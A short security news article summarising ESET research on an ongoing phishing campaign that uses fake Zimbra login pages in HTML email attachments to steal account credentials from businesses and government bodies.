Massive phishing campaign targets Zimbra users

ESET researchers identified a new phishing campaign that aims to steal the credentials of Zimbra email accounts.

According to the researchers, the campaign started in April this year and is still actively spreading, mainly targeting small to medium businesses and governmental institutions. The biggest number of targets in have been in Poland, Ecuador, and Italy. So far, the threat actors responsible for the attacks have not been identified.

Zimbra Collaboration is an open-core collaborative software platform providing an email server and a web client. The service is used by more than 200,000 businesses worldwide.

Malicious HTML attachment

At the core of the phishing campaign is a malicious email with an HTML attachment that appears to be an email from a server administrator.

The email warns the target about an email server update, account deactivation, or similar issue, and directs the user to click on the attached file.

Zimbra phishing campaign
Lure email warning in Polish about deactivation of the target’s Zimbra account | Source: ESET
Zimbra phishing campaign
Machine translation of lure email, originally in Polish | Source: ESET

The HTML file opens in the victim’s browser, creating the illusion that it’s the genuine login page to Zimbra account. The login page is customized according to the targeted organization. However, the URL reveals that it points to a local file path.

Fake Zimbra login page
Fake Zimbra login page | Source: ESET

In the background, the submitted credentials are collected from the HTML form and sent to a server controlled by the malicious actor.

Researchers also noticed phishing emails sent from previously targeted Zimbra accounts. This means that malicious actors might have compromised victims' administrator accounts and created additional mailboxes that have been used in phishing campaigns.